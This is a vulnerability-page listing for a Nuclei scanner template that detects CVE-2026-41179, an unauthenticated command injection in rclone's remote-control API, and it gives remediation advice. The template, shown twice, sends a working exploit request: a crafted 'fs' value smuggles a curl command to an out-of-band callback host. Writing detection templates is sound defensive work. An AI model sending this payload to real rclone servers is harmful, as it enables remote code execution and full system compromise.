RClone RC - Command Injection

CVE-2026-41179

Verified

Description

Rclone >= 1.48.0 and < 1.73.5 contains an unauthenticated local command execution caused by unauthenticated access to the RC endpoint operations/fsinfo with attacker-controlled fs input, letting unauthenticated attackers execute local commands, exploit requires reachable RC deployment without global HTTP authentication.

Severity

Critical

CVSS Score

9.2

Exploit Probability

Affected Product

rclone

Published Date

April 23, 2026

Template Author

theamanrawat

CVE-2026-41179.yaml

id: CVE-2026-41179

info:
  name: RClone RC - Command Injection
  author: theamanrawat
  severity: critical
  description: |
    Rclone >= 1.48.0 and < 1.73.5 contains an unauthenticated local command execution caused by unauthenticated access to the RC endpoint operations/fsinfo with attacker-controlled fs input, letting unauthenticated attackers execute local commands, exploit requires reachable RC deployment without global HTTP authentication.
  impact: |
    Unauthenticated attackers can execute local commands remotely, potentially leading to full system compromise.
  remediation: |
    Update to version 1.73.5 or later.
  reference:
    - https://github.com/rclone/rclone/security/advisories/GHSA-jfwf-28xr-xw6q
    - https://nvd.nist.gov/vuln/detail/CVE-2026-41179
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 9.2
    cve-id: CVE-2026-41179
    epss-score: 0.04748
    epss-percentile: 0.89549
    cwe-id: CWE-78
  metadata:
    verified: true
    max-request: 2
    vendor: rclone
    product: rclone
  tags: cve,cve2026,rce,rclone,webdav,oast,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /rc/noop HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{}")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /operations/fsinfo HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"fs":":webdav,url='http://{{interactsh-url}}/',vendor=other,bearer_token_command='curl http://{{interactsh-url}}/{{randstr}}':"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Features")'
          - 'contains(interactsh_protocol, "http")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450221009e291a546e11f0d45926695fe0409fc2fd795de8769e7e246b5c2eee8353c77f022022aa064c39a8825a3aee3faf061cf37aa34c33d7d32ff4a869ebc4cafbc0fa8a:922c64590222798bb761d5b6d8e72950

9.2Score

CVSS Metrics

CVSS Vector:

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVE ID:

cve-2026-41179

CWE ID:

cwe-78

References

https://github.com/rclone/rclone/security/advisories/GHSA-jfwf-28xr-xw6q https://nvd.nist.gov/vuln/detail/CVE-2026-41179

Remediation Steps

Update to version 1.73.5 or later.

Description

id: CVE-2026-41179

info:
  name: RClone RC - Command Injection
  author: theamanrawat
  severity: critical
  description: |
    Rclone >= 1.48.0 and < 1.73.5 contains an unauthenticated local command execution caused by unauthenticated access to the RC endpoint operations/fsinfo with attacker-controlled fs input, letting unauthenticated attackers execute local commands, exploit requires reachable RC deployment without global HTTP authentication.
  impact: |
    Unauthenticated attackers can execute local commands remotely, potentially leading to full system compromise.
  remediation: |
    Update to version 1.73.5 or later.
  reference:
    - https://github.com/rclone/rclone/security/advisories/GHSA-jfwf-28xr-xw6q
    - https://nvd.nist.gov/vuln/detail/CVE-2026-41179
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 9.2
    cve-id: CVE-2026-41179
    epss-score: 0.04748
    epss-percentile: 0.89549
    cwe-id: CWE-78
  metadata:
    verified: true
    max-request: 2
    vendor: rclone
    product: rclone
  tags: cve,cve2026,rce,rclone,webdav,oast,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /rc/noop HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{}")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /operations/fsinfo HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"fs":":webdav,url='http://{{interactsh-url}}/',vendor=other,bearer_token_command='curl http://{{interactsh-url}}/{{randstr}}':"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Features")'
          - 'contains(interactsh_protocol, "http")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450221009e291a546e11f0d45926695fe0409fc2fd795de8769e7e246b5c2eee8353c77f022022aa064c39a8825a3aee3faf061cf37aa34c33d7d32ff4a869ebc4cafbc0fa8a:922c64590222798bb761d5b6d8e72950

RClone RC - Command Injection

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

RClone RC - Command Injection

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps